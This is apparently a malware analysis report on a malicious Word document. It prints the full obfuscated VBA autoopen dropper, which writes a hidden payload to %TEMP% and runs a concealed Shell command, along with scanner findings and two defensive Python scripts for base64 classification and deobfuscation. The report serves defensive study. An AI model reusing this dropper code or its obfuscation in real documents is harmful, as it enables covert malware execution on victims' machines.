Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 48918f4acc1f56e5…

MALICIOUS

Office (OLE)

Size: 310.0 KB
Created: 2016-05-20 07:07:00
Authoring application: Microsoft Office Word
First seen: 2018-09-04
MD5: 98247b9ce269937e31021f3f3f23d56e
SHA-1: e0c6855be854ee8d3d91c112c16091b07f77fa15
SHA-256: 48918f4acc1f56e56030d866d4c28806f8ffb192e04b08695f7363a3d9b39951
Risk score: 278

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1059 Command and Scripting Interpreter

The sample contains a VBA macro with an `autoopen` subroutine, so the code runs as soon as the document is opened with macros enabled. The recovered source shows a dropper, not a downloader: the macro builds the ProgID `Scripting.FileSystemObject` from split literals (`"Scr" + "iptin" + "g.FileSy" + "stemOb" + "ject"`), creates `%TEMP%\panda.pfx` with `CreateTextFile`, writes a value taken from a second module (`iyUGBKJdasddd.hgKjhasdjDDD11`) into it, closes the file, and calls `Shell` with window style 0 (`vbHide`) on a command line concatenated from ten further properties of that module (`hgKjhasdjDDD1` to `hgKjhasdjDDD10`). `iyUGBKJdasddd` is a designer (UserForm) module, so the command line and the dropped payload are stored in form control properties that are not part of the VBA source olevba extracts; the listing shows the mechanism but not the final command or the payload, and whether that hidden command goes on to fetch anything cannot be determined statically from it. Nearly every real statement is separated by filler (`Dim ... As String` declarations and `LTrim`/`RTrim` of padded six-letter strings) and the identifiers are randomly generated, which is name-mangling obfuscation aimed at signature matching. The ClamAV detection Ole2.Macro.Agent-9858864-1 on the container corroborates the verdict; ClamAV reports nothing on the extracted macro text alone, which is expected when the signature keys on the OLE container rather than the decompressed source.

Heuristics (10)

  • ClamAV: Ole2.Macro.Agent-9858864-1 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Ole2.Macro.Agent-9858864-1
  • VBA macros detected [medium, 4 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] (OLE_VBA_SHELL)
    Matched line in script:
      Shell yTGliyTIasdd, 0
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    Matched line in script (followed by one of the filler declarations):
      Set hgJBsdasdDD = CreateObject("Scr" + yufGHJ + "g.FileSy" + gUYbjk + "ject")
      Dim EDNjGrlc, ZcErDyNX, FEhugLeu As String
  • AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
    Matched lines in script:
      Attribute VB_Customizable = True
      Sub autoopen()
  • Environ() call (env variable access) [low] (OLE_VBA_ENVIRON)
    Matched line in script (followed by one of the filler declarations):
      Set TDYFUGasdDc = hgJBsdasdDD.CreateTextFile(Environ("TEMP") & "\pan" + asjhdbkx + "x", True)
      Dim IawqTVly, nksXxyIO, ydMjOnnA As String
  • Heap-spray pattern detected [high] (SC_HEAP_SPRAY)
    Repeated 0x41 (A) bytes found
    Analyst note: 0x41 is ASCII 'A', which is the base64 digit for six zero bits, so a long run of it is the normal appearance of a zero-filled region inside a base64-encoded binary. Given that the macro writes a text payload with CreateTextFile, this run is encoded payload data rather than a sprayed heap; the listing below is the scanner disassembling text as if it were code, and every byte decodes to the same one-byte instruction.
    Disassembly
    Attempted x86 opcode disassembly (96 identical bytes, collapsed)
    0000F49C-0000F4FB  41 (x96)          inc ecx
  • NOP-equivalent sled detected [medium] (SC_NOP_EQUIV_SLED)
    Long run of 0x41 bytes
    Analyst note: the bytes that follow the run (0000BAFC onward, listed below) are all printable characters of the base64 alphabet and read "QAAAAFBFAABMARAAVwEBAAAMAgAoAQAA4AAHAwsBAgwAkAAAg". Base64-decoding them with 'Q' at the start of a quad gives 40 00 00 00 50 45 00 00 4C 01 ..., that is a 4-byte value 0x40 (consistent with the e_lfanew field of a DOS header) followed by the PE signature "PE\0\0" and an i386 Machine field (0x014C); the other three quad alignments decode to nothing structured. The run is therefore base64 text of an embedded PE image, and the "sled" and the x86 listing are artefacts of disassembling text.
    Disassembly
    Attempted x86 opcode disassembly (the leading 47 identical bytes collapsed)
    0000BACD-0000BAFB  41 (x47)          inc ecx
    0000BAFC  51                push ecx
    0000BAFD  41                inc ecx
    0000BAFE  41                inc ecx
    0000BAFF  41                inc ecx
    0000BB00  41                inc ecx
    0000BB01  46                inc esi
    0000BB02  42                inc edx
    0000BB03  46                inc esi
    0000BB04  41                inc ecx
    0000BB05  41                inc ecx
    0000BB06  42                inc edx
    0000BB07  4d                dec ebp
    0000BB08  41                inc ecx
    0000BB09  52                push edx
    0000BB0A  41                inc ecx
    0000BB0B  41                inc ecx
    0000BB0C  56                push esi
    0000BB0D  7745              ja 0xbb54
    0000BB0F  42                inc edx
    0000BB10  41                inc ecx
    0000BB11  41                inc ecx
    0000BB12  41                inc ecx
    0000BB13  4d                dec ebp
    0000BB14  41                inc ecx
    0000BB15  6741              inc ecx
    0000BB17  6f                outsd dx, dword ptr [esi]
    0000BB18  41                inc ecx
    0000BB19  51                push ecx
    0000BB1A  41                inc ecx
    0000BB1B  41                inc ecx
    0000BB1C  3441              xor al, 0x41
    0000BB1E  41                inc ecx
    0000BB1F  48                dec eax
    0000BB20  41                inc ecx
    0000BB21  7773              ja 0xbb96
    0000BB23  42                inc edx
    0000BB24  41                inc ecx
    0000BB25  677741            ja 0xbb69
    0000BB28  6b414141          imul eax, dword ptr [ecx + 0x41], 0x41
    0000BB2C  67                .byte 0x67
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The heuristic's own wording ("no modern VBA project was recovered") is generic and does not hold for this sample: a VBA project was recovered (see OLE_VBA_MACROS and the extracted macros.bas), so this finding is redundant evidence for the same autoopen entry point, not a second execution path and not a downloader or parser-CVE attribution.
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
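The two shellcode heuristics above (SC_HEAP_SPRAY and SC_NOP_EQUIV_SLED) fire on bytes that are really base64 text. The following script is an added example written for this report, not part of the original page or of any scanner: it takes the byte values printed in the NOP-sled listing (47 times 0x41 at 0000BACD-0000BAFB, then the 49 varied bytes at 0000BAFC-0000BB2C), checks that every byte is in the base64 alphabet, tries the four possible quad alignments because the start of the encoded blob is not known, and looks for a PE signature in the decoded bytes. `RUN` is transcribed from the listing; `SHELLCODE_LIKE` is a constructed contrast case that a genuine code run would resemble.

```python
"""Classify a 0x41-heavy byte run: base64 payload text or possible code?

Added example, not from the report or from any scanner. 0x41 is ASCII 'A',
the base64 digit for six zero bits, so a run of it is how a zero-filled
region of an encoded binary looks. classify_run() checks the alphabet,
then tries all four quad alignments and searches the decode for "PE\0\0".
"""
import base64
import string

B64_ALPHABET = frozenset((string.ascii_letters + string.digits + '+/=').encode())

# Transcribed from the listing: 0000BACD..0000BAFB are 47 x 0x41,
# 0000BAFC..0000BB2C are the 49 bytes below ("QAAAAFBF...AAAg").
RUN = b'A' * 47 + bytes([
    0x51, 0x41, 0x41, 0x41, 0x41, 0x46, 0x42, 0x46, 0x41, 0x41, 0x42, 0x4d,
    0x41, 0x52, 0x41, 0x41, 0x56, 0x77, 0x45, 0x42, 0x41, 0x41, 0x41, 0x4d,
    0x41, 0x67, 0x41, 0x6f, 0x41, 0x51, 0x41, 0x41, 0x34, 0x41, 0x41, 0x48,
    0x41, 0x77, 0x73, 0x42, 0x41, 0x67, 0x77, 0x41, 0x6b, 0x41, 0x41, 0x41,
    0x67,
])

# Constructed contrast case: a real NOP sled into a small x86 stub.
SHELLCODE_LIKE = b'\x90' * 16 + b'\x31\xc0\x50\x68'


def classify_run(data):
    """Return alphabet check, zero ('A') fraction, alignment and PE offset."""
    result = {
        'all_base64': all(b in B64_ALPHABET for b in data),
        'zero_fraction': data.count(0x41) / max(len(data), 1),
        'best_offset': None,   # quad phase at which a PE signature appeared
        'pe_offset': -1,       # index of "PE\0\0" in the decoded bytes
        'decoded': b'',
    }
    if not result['all_base64']:
        result['verdict'] = 'not base64 text; treat the code heuristic as live'
        return result
    # The blob's quad boundary is unknown, so try each of the four phases
    # and decode the longest multiple-of-four prefix from that phase.
    for k in range(4):
        chunk = data[k:k + (len(data) - k) // 4 * 4]
        dec = base64.b64decode(chunk, validate=True)
        pe = dec.find(b'PE\x00\x00')
        if pe >= 0:
            result.update(best_offset=k, pe_offset=pe, decoded=dec)
            break
    if result['pe_offset'] >= 0:
        pe = result['pe_offset']
        machine = int.from_bytes(result['decoded'][pe + 4:pe + 6], 'little')
        result['verdict'] = (f'base64-encoded PE image (Machine=0x{machine:04x}); '
                             'the 0x41 run is zero padding, not a sled')
    else:
        result['verdict'] = ('base64 text: the 0x41 run decodes to zero bytes; '
                             'no PE header inside this window')
    return result


if __name__ == '__main__':
    for name, blob in (('NOP-sled run', RUN), ('heap-spray run', b'A' * 96),
                       ('contrast', SHELLCODE_LIKE)):
        print(f'{name}: {classify_run(blob)["verdict"]}')
```

Only phase 3 yields a signature, which places "PE\0\0" 37 bytes into the decode, directly after 33 zero bytes and the 4-byte value 0x40; the fields that follow (Machine 0x014C, SizeOfOptionalHeader 0xE0 twenty bytes after the signature, optional-header Magic 0x010B four bytes after that) sit at their standard PE32 offsets, which is what distinguishes a real header from a coincidental four-byte match.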

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8069 bytes
SHA-256: 95080f497ed431cd6cf3421042b5e990fab8dd47be690f20a4e4c405d4f21764
Detection
ClamAV: No threats found
Obfuscation or payload: likely
153 of 219 identifiers look randomly generated (e.g. 'hgKjhasdjDDD11'), consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
  Sub autoopen()

  Dim hgJBsdasdDD, TDYFUGasdDc
Dim PZOTcVvh, IddlwNtF, MlBwVFiB As String
Dim PWkSOXRl, TXZVrazm, ACSpvtbw As String
PWkSOXRl = "           VSQVOK               "
TXZVrazm = LTrim(PWkSOXRl)
ACSpvtbw = RTrim(TXZVrazm)

PZOTcVvh = "           HBYBNA               "
Dim iRrAyvqN, NWWdCTnE, TJZUpakw As String
iRrAyvqN = "           KYKFBV               "
NWWdCTnE = LTrim(iRrAyvqN)
TJZUpakw = RTrim(NWWdCTnE)

IddlwNtF = LTrim(PZOTcVvh)
Dim vNRhWiWu, aqKpRTRA, haVDPjHp As String
vNRhWiWu = "           OLLRCU               "
aqKpRTRA = LTrim(vNRhWiWu)
haVDPjHp = RTrim(aqKpRTRA)

MlBwVFiB = RTrim(IddlwNtF)

Dim gAzpgkkf, nUFdJywv, SDnhlLvO As String
gAzpgkkf = "           TBGFWQ               "
nUFdJywv = LTrim(gAzpgkkf)
SDnhlLvO = RTrim(nUFdJywv)

  yTGliyTIasdd = iyUGBKJdasddd.hgKjhasdjDDD1 + iyUGBKJdasddd.hgKjhasdjDDD2 + iyUGBKJdasddd.hgKjhasdjDDD3 + iyUGBKJdasddd.hgKjhasdjDDD4 + iyUGBKJdasddd.hgKjhasdjDDD5 + iyUGBKJdasddd.hgKjhasdjDDD6 + iyUGBKJdasddd.hgKjhasdjDDD7 + iyUGBKJdasddd.hgKjhasdjDDD8 + iyUGBKJdasddd.hgKjhasdjDDD9 + iyUGBKJdasddd.hgKjhasdjDDD10
Dim lWwvOhlk, gWTPrlHl, pXGXvvfm As String
Dim zlChhEUG, CmiAPUtH, LwkDtSZK As String
zlChhEUG = "           UVADNI               "
CmiAPUtH = LTrim(zlChhEUG)
LwkDtSZK = RTrim(CmiAPUtH)

lWwvOhlk = "           HQDJOA               "
Dim AFeYjrxM, uOQaEvgQ, SRlwHLyE As String
AFeYjrxM = "           ZQKHRD               "
uOQaEvgQ = LTrim(AFeYjrxM)
SRlwHLyE = RTrim(uOQaEvgQ)

gWTPrlHl = LTrim(lWwvOhlk)
Dim BbYiBYtl, dhQSrkjz, GnNYDGNw As String
BbYiBYtl = "           GWHKPN               "
dhQSrkjz = LTrim(BbYiBYtl)
GnNYDGNw = RTrim(dhQSrkjz)

pXGXvvfm = RTrim(gWTPrlHl)

Dim LAgscEzT, tUagBktH, jDDkntia As String
LAgscEzT = "           APNCFP               "
tUagBktH = LTrim(LAgscEzT)
jDDkntia = RTrim(tUagBktH)

    yufGHJ = "iptin"
Dim TGIqKzki, qQhTtcpN, HYVakKaJ As String
Dim ItEKzSbR, RtDrxJCY, byChJWmU As String
ItEKzSbR = "           VHJALD               "
RtDrxJCY = LTrim(ItEKzSbR)
byChJWmU = RTrim(RtDrxJCY)

TGIqKzki = "           CAEVZM               "
Dim gGSXWydz, LPlkoAtM, vTaSwXXQ As String
gGSXWydz = "           GATHRX               "
LPlkoAtM = LTrim(gGSXWydz)
vTaSwXXQ = RTrim(LPlkoAtM)

qQhTtcpN = LTrim(TGIqKzki)
Dim FqUBuYrB, eaDEdkhU, TszcXGBa As String
FqUBuYrB = "           PFJDFN               "
eaDEdkhU = LTrim(FqUBuYrB)
TszcXGBa = RTrim(eaDEdkhU)

HYVakKaJ = RTrim(qQhTtcpN)

Dim ZVetOHBt, nOYKUKTE, SGlWoYIF As String
ZVetOHBt = "           SPGSTC               "
nOYKUKTE = LTrim(ZVetOHBt)
SGlWoYIF = RTrim(nOYKUKTE)

  gUYbjk = "stemOb"
Dim SwOXlWmc, asFbvYYy, Ecelirhn As String
Dim YHeMMLST, ZJdyfCpY, cJxkIzUI As String
YHeMMLST = "           COEZGH               "
ZJdyfCpY = LTrim(YHeMMLST)
cJxkIzUI = RTrim(ZJdyfCpY)

SwOXlWmc = "           OMJSLI               "
Dim twyxzlNO, CSXiLngd, ZIRZyXut As String
twyxzlNO = "           JZLQCW               "
CSXiLngd = LTrim(twyxzlNO)
ZIRZyXut = RTrim(CSXiLngd)

asFbvYYy = LTrim(SwOXlWmc)
Dim YZmNKJBt, oDOMAgIv, cEGcYNMu As String
YZmNKJBt = "           DUGXWB               "
oDOMAgIv = LTrim(YZmNKJBt)
cEGcYNMu = RTrim(oDOMAgIv)

Ecelirhn = RTrim(asFbvYYy)

Dim QmlCnQnl, OyXOvDuL, WsISanpe As String
QmlCnQnl = "           JXCIAM               "
OyXOvDuL = LTrim(QmlCnQnl)
WsISanpe = RTrim(OyXOvDuL)

  Set hgJBsdasdDD = CreateObject("Scr" + yufGHJ + "g.FileSy" + gUYbjk + "ject")
Dim EDNjGrlc, ZcErDyNX, FEhugLeu As String
Dim UoqfFTUX, EpmboPtV, vpRQEFZB As String
UoqfFTUX = "           CKUSSP               "
EpmboPtV = LTrim(UoqfFTUX)
vpRQEFZB = RTrim(EpmboPtV)

EDNjGrlc = "           DTFKOR               "
Dim xMGYtHAp, aGczkqlz, YPtxRYpL As String
xMGYtHAp = "           NFQJVU               "
aGczkqlz = LTrim(xMGYtHAp)
YPtxRYpL = RTrim(aGczkqlz)

ZcErDyNX = LTrim(EDNjGrlc)
Dim gtUazCyF, EWSTuIkx, yuabHyaH As String
gtUazCyF = "           CQHFQO               "
EWSTuIkx = LTrim(gtUazCyF)
yuabHyaH = RTrim(EWSTuIkx)

FEhugLeu = RTrim(ZcErDyNX)

Dim peUDviJz, wolHNXMd, lLCZVVnS As String
peUDviJz = "           EDTENY               "
wolHNXMd = LTrim(peUDviJz)
lLCZVVnS = RTrim(wolHNXMd)

  asjhdbkx = "da.pf"
Dim lwGCMgsK, fxBpflOL, pcowIcuW As String
Dim AlRDCDJX, clFBjKgC, llVqQXSV As String
AlRDCDJX = "           MCJVHD               "
clFBjKgC = LTrim(AlRDCDJX)
llVqQXSV = RTrim(clFBjKgC)

lwGCMgsK = "           HBCRGA               "
Dim TlLlYZLy, pgnDLCPV, GpoiykZG As String
TlLlYZLy = "           CHIZCY               "
pgnDLCPV = LTrim(TlLlYZLy)
GpoiykZG = RTrim(pgnDLCPV)

fxBpflOL = LTrim(lwGCMgsK)
Dim hnRqKHVj, KQLtAfUQ, uABOUBLl As String
hnRqKHVj = "           TYMAWV               "
KQLtAfUQ = LTrim(hnRqKHVj)
uABOUBLl = RTrim(KQLtAfUQ)

pcowIcuW = RTrim(fxBpflOL)

Dim HFuDZdro, eMLHrail, gNTLTGqE As String
HFuDZdro = "           LYKEZI               "
eMLHrail = LTrim(HFuDZdro)
gNTLTGqE = RTrim(eMLHrail)

  Set TDYFUGasdDc = hgJBsdasdDD.CreateTextFile(Environ("TEMP") & "\pan" + asjhdbkx + "x", True)
Dim IawqTVly, nksXxyIO, ydMjOnnA As String
Dim pVYReBWK, tBHHxrlL, aBNeJoHM As String
pVYReBWK = "           QDKMLL               "
tBHHxrlL = LTrim(pVYReBWK)
aBNeJoHM = RTrim(tBHHxrlL)

IawqTVly = "           YJAYQQ               "
Dim GIGOXlOg, mExroFnu, fMfGNWGP As String
GIGOXlOg = "           OIQKLW               "
mExroFnu = LTrim(GIGOXlOg)
fMfGNWGP = RTrim(mExroFnu)

nksXxyIO = LTrim(IawqTVly)
Dim thsOLeKw, lykdBFrr, WjTuIsDc As String
thsOLeKw = "           KJYTUS               "
lykdBFrr = LTrim(thsOLeKw)
WjTuIsDc = RTrim(lykdBFrr)

ydMjOnnA = RTrim(nksXxyIO)

Dim MLvcCrto, yNqnvJil, kyCENTsR As String
MLvcCrto = "           WINWSR               "
yNqnvJil = LTrim(MLvcCrto)
kyCENTsR = RTrim(yNqnvJil)

  TDYFUGasdDc.Write (iyUGBKJdasddd.hgKjhasdjDDD11)
Dim tDVDfnzT, lZrjldff, XFkqePCU As String
Dim tBJDSVcb, DRKIEhcG, IRzMCmWH As String
tBJDSVcb = "           ZELHXB               "
DRKIEhcG = LTrim(tBJDSVcb)
IRzMCmWH = RTrim(DRKIEhcG)

tDVDfnzT = "           KZBUJV               "
Dim tmsXeXYa, OjLjhkcK, gsAQZShP As String
tmsXeXYa = "           JAXVCP               "
OjLjhkcK = LTrim(tmsXeXYa)
gsAQZShP = RTrim(OjLjhkcK)

lZrjldff = LTrim(tDVDfnzT)
Dim ojLyNKnL, QZuNOhpd, NldEGawW As String
ojLyNKnL = "           MJXJPY               "
QZuNOhpd = LTrim(ojLyNKnL)
NldEGawW = RTrim(QZuNOhpd)

XFkqePCU = RTrim(lZrjldff)

Dim TzbgrpYc, JiskTVOU, rfVmiQDK As String
TzbgrpYc = "           WCTBTN               "
JiskTVOU = LTrim(TzbgrpYc)
rfVmiQDK = RTrim(JiskTVOU)

  TDYFUGasdDc.Close
Dim emlXEZBV, atXIARTx, dsIQrlIU As String
Dim TweGLhOb, Axfaflun, xccdIvRA As String
TweGLhOb = "           XBRBFA               "
Axfaflun = LTrim(TweGLhOb)
xccdIvRA = RTrim(Axfaflun)

emlXEZBV = "           BXCUEH               "
Dim WCNGkVvp, nLIpRlhz, yFhRJDiM As String
WCNGkVvp = "           TTSDGJ               "
nLIpRlhz = LTrim(WCNGkVvp)
yFhRJDiM = RTrim(nLIpRlhz)

atXIARTx = LTrim(emlXEZBV)
Dim uaAwOZIe, OsHhlNkx, VzWLcSEt As String
uaAwOZIe = "           NMKUJK               "
OsHhlNkx = LTrim(uaAwOZIe)
VzWLcSEt = RTrim(OsHhlNkx)

dsIQrlIU = RTrim(atXIARTx)

Dim TTQxGzTx, EjfpDrqW, GxNdgKgy As String
TTQxGzTx = "           FAYWIE               "
EjfpDrqW = LTrim(TTQxGzTx)
GxNdgKgy = RTrim(EjfpDrqW)

  Shell yTGliyTIasdd, 0

  End Sub





Attribute VB_Name = "iyUGBKJdasddd"
Attribute VB_Base = "0{66AB4D45-849F-4A75-A347-FBE52CBB66D5}{0584011C-B1B1-4DB6-94FE-EDBE2FAFDE09}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
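The listing above is readable once the filler is removed and the split strings are joined. The script below is an added example written for this report (not oletools code and not from the original page): it does by program what an analyst does by hand on this macro, dropping the interleaved junk statements (typed `Dim` lines, `LTrim`/`RTrim` of padded six-letter strings), tracking the string assignments, and folding the `"Scr" + yufGHJ + ...` concatenations into the literal strings handed to `CreateObject`, `CreateTextFile`, `Write` and `Shell`. `MACRO` is an excerpt copied from macros.bas with most of the filler omitted; the property names of the UserForm module `iyUGBKJdasddd` cannot be resolved from VBA source and are left as `<markers>` so the output shows exactly what is and is not recoverable.

```python
"""Static deobfuscation of the autoopen() macro in macros.bas.

Added example, not part of the report and not oletools code. Junk is
removed by pattern, string assignments are folded in order, and the
four calls that matter are resolved against the collected constants.
"""
import re

# Excerpt copied from the extracted macros.bas listing (filler trimmed).
MACRO = r'''
Sub autoopen()
  Dim hgJBsdasdDD, TDYFUGasdDc
Dim PZOTcVvh, IddlwNtF, MlBwVFiB As String
Dim PWkSOXRl, TXZVrazm, ACSpvtbw As String
PWkSOXRl = "           VSQVOK               "
TXZVrazm = LTrim(PWkSOXRl)
ACSpvtbw = RTrim(TXZVrazm)
  yTGliyTIasdd = iyUGBKJdasddd.hgKjhasdjDDD1 + iyUGBKJdasddd.hgKjhasdjDDD2 + iyUGBKJdasddd.hgKjhasdjDDD3 + iyUGBKJdasddd.hgKjhasdjDDD4 + iyUGBKJdasddd.hgKjhasdjDDD5 + iyUGBKJdasddd.hgKjhasdjDDD6 + iyUGBKJdasddd.hgKjhasdjDDD7 + iyUGBKJdasddd.hgKjhasdjDDD8 + iyUGBKJdasddd.hgKjhasdjDDD9 + iyUGBKJdasddd.hgKjhasdjDDD10
Dim zlChhEUG, CmiAPUtH, LwkDtSZK As String
zlChhEUG = "           UVADNI               "
CmiAPUtH = LTrim(zlChhEUG)
LwkDtSZK = RTrim(CmiAPUtH)
    yufGHJ = "iptin"
  gUYbjk = "stemOb"
  Set hgJBsdasdDD = CreateObject("Scr" + yufGHJ + "g.FileSy" + gUYbjk + "ject")
  asjhdbkx = "da.pf"
  Set TDYFUGasdDc = hgJBsdasdDD.CreateTextFile(Environ("TEMP") & "\pan" + asjhdbkx + "x", True)
  TDYFUGasdDc.Write (iyUGBKJdasddd.hgKjhasdjDDD11)
  TDYFUGasdDc.Close
  Shell yTGliyTIasdd, 0
  End Sub
'''

JUNK_PATTERNS = [
    re.compile(r'Dim\s+\w+(?:\s*,\s*\w+)*\s+As\s+String'),  # declared, never used
    re.compile(r'\w+\s*=\s*[LR]Trim\(\w+\)'),               # trims a junk string
    re.compile(r'\w+\s*=\s*"\s+[A-Z]{6}\s+"'),               # padded random tag
]
CALLS = [  # key -> regex whose group(1) is the string expression to fold
    ('createobject', re.compile(r'CreateObject\((.+)\)$')),
    ('dropped_file', re.compile(r'\.CreateTextFile\((.+),\s*(?:True|False)\)$')),
    ('payload_source', re.compile(r'\.Write\s*\((.+)\)$')),
    ('shell_command', re.compile(r'^Shell\s+(.+?),\s*\d+$')),
]


def is_junk(line):
    """True for the filler statements that carry no behaviour."""
    s = line.strip()
    return any(p.fullmatch(s) for p in JUNK_PATTERNS)


def fold(expr, consts):
    """Evaluate a VBA concatenation (+ or &) against the constants seen so far.

    Literals are used verbatim, Environ("X") becomes %X%, and anything that
    cannot be resolved from source (the UserForm properties) stays as <name>.
    """
    out = []
    for tok in re.split(r'\s*[+&]\s*', expr.strip()):
        lit = re.fullmatch(r'"([^"]*)"', tok)
        env = re.fullmatch(r'Environ\("(\w+)"\)', tok)
        if lit:
            out.append(lit.group(1))
        elif env:
            out.append('%' + env.group(1) + '%')
        else:
            out.append(consts.get(tok, '<' + tok + '>'))
    return ''.join(out)


def analyze(macro):
    """Strip junk, replay string assignments, resolve the key calls."""
    consts, kept, junk, found = {}, [], 0, {}
    for raw in macro.splitlines():
        line = raw.strip()
        if not line:
            continue
        if is_junk(line):
            junk += 1
            continue
        kept.append(line)
        m = re.fullmatch(r'(\w+)\s*=\s*(.+)', line)   # plain assignment (not Set)
        if m:
            consts[m.group(1)] = fold(m.group(2), consts)
            continue
        for key, pat in CALLS:
            m = pat.search(line)
            if m:
                found[key] = fold(m.group(1), consts)
        m = re.fullmatch(r'Shell\s+.+?,\s*(\d+)', line)
        if m:
            found['window_style'] = int(m.group(1))   # 0 == vbHide
    found.update(junk_lines=junk, kept_lines=len(kept), kept=kept)
    return found


if __name__ == '__main__':
    for key, value in analyze(MACRO).items():
        print(f'{key}: {value}')
```

On this excerpt the resolved calls are `CreateObject("Scripting.FileSystemObject")`, `CreateTextFile("%TEMP%\panda.pfx", True)`, a `Write` of `<iyUGBKJdasddd.hgKjhasdjDDD11>` and a hidden `Shell` of the ten concatenated `<iyUGBKJdasddd.hgKjhasdjDDD1..10>` properties; the markers are the point, since they show that the next step is to pull those values out of the form's stream rather than to read more VBA.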